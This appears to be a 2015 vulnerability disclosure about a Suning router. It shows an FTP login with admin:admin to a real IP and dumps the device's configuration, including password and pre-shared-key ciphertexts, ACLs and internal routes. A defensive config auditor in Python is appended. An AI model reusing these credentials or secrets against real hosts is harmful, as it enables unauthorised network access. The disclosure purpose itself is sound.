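2015-01-07: Details reported to the vendor; awaiting vendor handling
2015-01-07: Vendor confirmed; details disclosed to the vendor only
2015-01-17: Details disclosed to core white hats and experts in related fields
2015-01-27: Details disclosed to regular white hats
2015-02-06: Details disclosed to intern white hats
2015-02-21: Details disclosed to the public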
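A Suning perimeter network device has a weak password (exposing the SSL VPN configuration file); further exploitation could possibly bypass the perimeter firewall
Weak credentials on the network device's FTP service: admin:admin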
172-13-1-117:~ root$ ftp 58.213.19.168
Connected to 58.213.19.168.
220 FTP service ready.
Name (58.213.19.168:root): admin
331 Password required for admin.
Password:
230 User logged in.
Remote system type is H3C.
ftp> ls
227 Entering Passive Mode (58,213,19,168,19,23).
125 ASCII mode data connection already open, transfer starting for /*.
drwxrwxrwx 1 noone nogroup 0 Oct 19 2010 logfile
-rwxrwxrwx 1 noone nogroup 16256 Oct 19 2010 p2p_default.mtd
-rwxrwxrwx 1 noone nogroup 3751 Aug 18 2014 system.xml
-rwxrwxrwx 1 noone nogroup 6187 Aug 18 2014 startup.cfg
-rwxrwxrwx 1 noone nogroup 27450368 Jul 08 2014 msr30-cmw520-r2513p01-si.bin
-rwxrwxrwx 1 noone nogroup 24621440 Jul 08 2014 msr30-cmw520-r2207-si.bin
-rwxrwxrwx 1 noone nogroup 17449340 Jul 08 2014 msr30-cmw520-r2207p38-bi.bin
-rwxrwxrwx 1 noone nogroup 20147 Aug 18 2014 config.cwmp
-rwxrwxrwx 1 noone nogroup 5324 Jul 25 2014 _startup_bak.cfg
-rwxrwxrwx 1 noone nogroup 476922 Aug 01 2014 vpn3040.diag
-rwxrwxrwx 1 noone nogroup 188545 Aug 17 2014 default.diag
-rwxrwxrwx 1 noone nogroup 18324480 Aug 18 2014 msr30-cmw520-r2311-bi.bin
226 Transfer complete.
The authentication information for the infrastructure confirms that this is a Suning device:
local-user suning
 password cipher $c$3$AfZxBqelXWlJXRiJ83Av2ivB+WWEmBPDTEACLinFGc3+
 authorization-attribute level 3
 service-type ssh
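The telnet and HTTP management ports are open to the outside; you know what that means.
suning: the internal network architecture is fully exposed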
#
 dar p2p signature-file cfa0:/p2p_default.mtd
#
 port-security enable
#
 password-recovery enable
#
acl number 2000
 rule 0 permit source 10.22.9.5 0
 rule 5 permit source 10.22.9.215 0
 rule 10 permit source 10.21.160.99 0
#
acl number 3000
 rule 0 permit ip source 58.213.19.168 0 destination 221.226.125.148 0
 rule 5 permit ip source 1.1.1.1 0
 rule 10 permit ip source 221.226.125.148 0
 rule 15 permit ip source 2.2.2.2 0
acl number 3002 match-order auto
 description 2xuzhuang限速
 rule 0 permit ip destination 192.168.40.149 0
acl number 3303 match-order auto
 description vpn2xuzhuang
 rule 10 deny ip source 10.21.160.99 0
 rule 0 deny ip destination 10.21.160.99 0
 rule 5 permit ip
acl number 3304 match-order auto
 rule 5 permit ip source 192.168.0.0 0.0.255.255
 rule 10 permit ip source 10.19.0.0 0.0.255.255
 rule 15 permit ip source 10.24.0.0 0.0.255.255
 rule 20 permit ip source 10.22.0.0 0.0.255.255
 rule 0 deny ip destination 192.168.13.49 0
#
vlan 1
#
domain system
 access-limit disable
 state active
 idle-cut disable
 self-service-url disable
#
ike proposal 1
 encryption-algorithm 3des-cbc
#
ike peer access
 exchange-mode aggressive
 proposal 1
 pre-shared-key cipher $c$3$t6cH9TYK0j2lvziyz+VkcwnYSezftt1ugw==
 id-type name
 remote-name access
 nat traversal
#
ike peer xinjiekou
 exchange-mode aggressive
 proposal 1
 pre-shared-key cipher $c$3$fOTu6fpwl5bY1oMj/cT2stF3Ue5ED707rVdZUw==
 id-type name
 remote-name xinjiekou
 nat traversal
#
ike peer yinhe
 exchange-mode aggressive
 proposal 1
 pre-shared-key cipher $c$3$qjZO04rPk/ZAh0UJXOOG37rn958LzcHx3CZ/cuw=
 id-type name
 remote-name yinhe
 nat traversal
#
ipsec transform-set default
 encapsulation-mode tunnel
 transform esp
 esp authentication-algorithm md5
 esp encryption-algorithm 3des
#
ipsec policy-template xinjiekou 1
 ike-peer xinjiekou
 transform-set default
#
ipsec policy-template xuzhuang 1
 ike-peer access
 transform-set default
#
ipsec policy-template yinhe 1
 ike-peer yinhe
 transform-set default
#
ipsec policy ipsecdx 1 isakmp template xuzhuang
#
ipsec policy ipsecdx 2 isakmp template yinhe
#
ipsec policy ipsecdx 3 isakmp template xinjiekou
#
policy-based-route vpn2xuzhuang permit node 10
 if-match acl 3303
 apply ip-address next-hop 192.168.13.50
#
policy-based-route vpnup permit node 20
 if-match acl 3304
 apply ip-address next-hop 192.168.13.205
 apply ip-address next-hop 192.168.13.209
#
user-group system
 group-attribute allow-guest
#
local-user admin
 password cipher $c$3$kczijeyDQHGhKbH67mwOnmOlFMY1ZeHd
 authorization-attribute level 3
 service-type telnet
 service-type ftp
local-user suning
 password cipher $c$3$AfZxBqelXWlJXRiJ83Av2ivB+WWEmBPDTEACLinFGc3+
 authorization-attribute level 3
 service-type ssh
#
interface Aux0
 async mode flow
 link-protocol ppp
#
interface Cellular0/0
 async mode protocol
 link-protocol ppp
#
interface Serial4/0
 link-protocol ppp
#
interface NULL0
#
interface LoopBack0
#
interface LoopBack1000
#
interface GigabitEthernet0/0
 port link-mode route
#
interface GigabitEthernet0/0.104
 description To_JS5060-1互联.025
 vlan-type dot1q vid 104
#
interface GigabitEthernet0/0.1101
 description To_C7609-1互联
 vlan-type dot1q vid 1101
 ip policy-based-route vpn2xuzhuang
#
interface GigabitEthernet0/0.1102
 description To_C7609-2互联
 vlan-type dot1q vid 1102
 ip policy-based-route vpn2xuzhuang
#
interface GigabitEthernet0/1
 port link-mode route
 description To_互联网
#
interface GigabitEthernet0/1.2
 description To_CTC01
 vlan-type dot1q vid 2
 ipsec policy ipsecdx
 qos gts acl 3002 cir 50000 cbs 3125000 ebs 0 queue-length 50
#
interface Tunnel0
 description To_徐庄总部
 mtu 1524
 source LoopBack0
 destination 2.2.2.2
 ip policy-based-route vpnup
#
nqa entry 1 1
 type icmp-echo
  data-size 20
  destination ip 192.168.13.50
  frequency 1000
  probe count 2
  probe timeout 50
  reaction 1 checked-element probe-fail threshold-type consecutive 2 action-type trigger-only
  source ip 192.168.13.49
  ttl 1
#
 ip route-static 0.0.0.0 0.0.0.0 58.213.19.129 preference 5
 ip route-static 10.19.250.6 255.255.255.255 192.168.13.50
 ip route-static 10.21.160.99 255.255.255.255 192.168.13.205
 ip route-static 10.21.160.99 255.255.255.255 192.168.13.209 preference 120
 ip route-static 10.21.160.245 255.255.255.255 192.168.13.205
 ip route-static 10.22.9.5 255.255.255.255 192.168.13.205
 ip route-static 10.22.9.5 255.255.255.255 192.168.13.209 preference 120
 ip route-static 10.22.9.215 255.255.255.255 192.168.13.50
 ip route-static 172.33.0.1 255.255.255.255 172.16.0.1
 ip route-static 172.33.0.2 255.255.255.255 172.16.0.2
 ip route-static 192.168.0.0 255.255.0.0 192.168.13.209 preference 120
 ip route-static 192.168.0.0 255.255.0.0 192.168.13.205
#
system.xml
<!-- XML CONFIGURATION FILE -->
<sslvpn>
  <diyview>
    <title-diy-table>
      <row><index-title>SSL VPN</index-title><welcome-title>Welcome to SSL VPN</welcome-title><service-title>SSL VPN</service-title></row>
    </title-diy-table>
    <pic-save-table>
      <row><service-logo>/svpn/images/h3c.gif</service-logo><service-bg>/svpn/images/top_right_01.jpg</service-bg><index-logo>/svpn/images/h3c.gif</index-logo></row>
    </pic-save-table>
    <all-diy-table>
      <row><enable>0</enable></row>
    </all-diy-table>
  </diyview>
  <resview>
    <res-ipac-global-table>
      <row><keepalive>10</keepalive><clireach>0</clireach><onlyvpn>0</onlyvpn><sevdis>0</sevdis></row>
    </res-ipac-global-table>
    <res-group-table>
      <row><id>33890</id><name>autohome</name></row>
      <row><id>17507</id><name>autostart</name></row>
    </res-group-table>
  </resview>
  <userview>
    <user-group-table>
      <row><id>17408</id><name>Guests</name></row>
    </user-group-table>
    <user-table>
      <row><id>2162688</id><name>guest</name><description>Default guest user</description><password-md5>3C943016CF71D795F741F76EED5B63AF</password-md5><public>0</public><public-limit>0</public-limit><status>0</status><period>0-0-0</period><studymac>0</studymac></row>
    </user-table>
  </userview>
  <domainview>
    <domain-policy-table>
      <row><enable-sec-policy>0</enable-sec-policy><enable-verify>0</enable-verify><enable-only-client>0</enable-only-client><enable-bind-mac>0</enable-bind-mac><enable-auto-login>0</enable-auto-login><user-out-time>30</user-out-time><dft-auth-method>1</dft-auth-method><cert-sect>0</cert-sect><verify-out-time>120</verify-out-time></row>
    </domain-policy-table>
    <cache-policy-table>
      <row><clear-cache>1</clear-cache><clear-cookie>1</clear-cookie><clear-client>0</clear-client><clear-config>1</clear-config></row>
    </cache-policy-table>
    <dom-loc-auth-table>
      <row><cerpol>0</cerpol></row>
    </dom-loc-auth-table>
    <dom-radius-auth-table>
      <row><ifstartauth>0</ifstartauth><cerpol>0</cerpol><ifstartcharge>0</ifstartcharge><ifupvirtualaddr>0</ifupvirtualaddr></row>
    </dom-radius-auth-table>
    <dom-ldap-auth-table>
      <row><servport>389</servport><version>3</version><cerpol>0</cerpol><ifstartauth>0</ifstartauth><checkmethod>TEMPLATE</checkmethod></row>
    </dom-ldap-auth-table>
    <dom-ad-auth-table>
      <row><cerpol>0</cerpol><ifstartauth>0</ifstartauth><serverectime>5</serverectime><usrnamestyle>0</usrnamestyle></row>
    </dom-ad-auth-table>
    <dom-comb-auth-table>
      <row><ifstartcombauth>0</ifstartcombauth><cerpol>0</cerpol><ifinputpaswrdagain>0</ifinputpaswrdagain><cerpol_a>0</cerpol_a></row>
    </dom-comb-auth-table>
  </domainview>
  <servermng>
    <server-mng-table>
      <row><enable>0</enable><port>443</port></row>
    </server-mng-table>
  </servermng>
</sslvpn>
<nat>
  <nat>
    <respond-table>
      <row><respond-get>0</respond-get></row>
    </respond-table>
  </nat>
</nat>
<waninter>
  <macaddress>
    <macclone-table>
      <row><ifindex>1048576</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row>
      <row><ifindex>1048577</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eee</devmac><configure>1</configure></row>
      <row><ifindex>1049396</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eee</devmac><configure>1</configure></row>
      <row><ifindex>1049394</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row>
      <row><ifindex>1049395</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row>
      <row><ifindex>1049393</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row>
    </macclone-table>
  </macaddress>
</waninter>
<seclanserver>
  <rdserver>
    <rds-auth-table>
      <row><auth-enable>0</auth-enable></row>
    </rds-auth-table>
  </rdserver>
</seclanserver>
Close the external network interface.
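Added example (not part of the original report): a minimal auditor for Comware-style configuration text that flags the weak settings visible in the startup.cfg above, namely telnet/FTP enabled for local users, IKE aggressive mode, and 3DES/MD5 in the IKE and IPsec proposals. The sample configuration is constructed with placeholder secrets, and the rule set and function names are hypothetical.

```python
import re

# Constructed sample in the same layout as the startup.cfg in the report;
# secrets are placeholders, peer and user names are made up.
SAMPLE_CFG = """\
#
ike proposal 1
 encryption-algorithm 3des-cbc
#
ike peer branch1
 exchange-mode aggressive
 pre-shared-key cipher <placeholder>
#
ipsec transform-set default
 esp authentication-algorithm md5
 esp encryption-algorithm 3des
#
local-user admin
 service-type telnet
 service-type ftp
local-user ops
 service-type ssh
#
"""

# Hypothetical rule set: (section header regex, sub-command regex, finding)
RULES = [
    (r"local-user \S+", r"service-type .*\b(telnet|ftp)\b", "cleartext management service"),
    (r"ike peer \S+", r"exchange-mode aggressive\b", "IKE aggressive mode"),
    (r"(ike proposal|ipsec transform-set) \S+", r"(esp )?encryption-algorithm 3des", "3DES cipher"),
    (r"ipsec transform-set \S+", r"esp authentication-algorithm md5\b", "MD5 integrity"),
]

def audit(cfg: str):
    """Return (section, finding) pairs for every risky sub-command found."""
    findings, section = [], None
    for line in cfg.splitlines():
        if line.startswith("#") or not line.strip():
            section = None                   # '#' closes the current section
        elif not line.startswith(" "):
            section = line.strip()           # unindented line opens a section
        elif section:                        # indented sub-command of a section
            for head, body, msg in RULES:
                if re.fullmatch(head, section) and re.match(body, line.strip()):
                    findings.append((section, msg))
    return findings

if __name__ == "__main__":
    print("\n".join(f"{s}: {m}" for s, m in audit(SAMPLE_CFG)))
```

Findings are reported per sub-command, so a user with both telnet and FTP enabled appears twice.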
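Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-01-07 20:03
Thanks for the submission. A rookie mistake; this was a waste of 猪猪侠's talents.
None yet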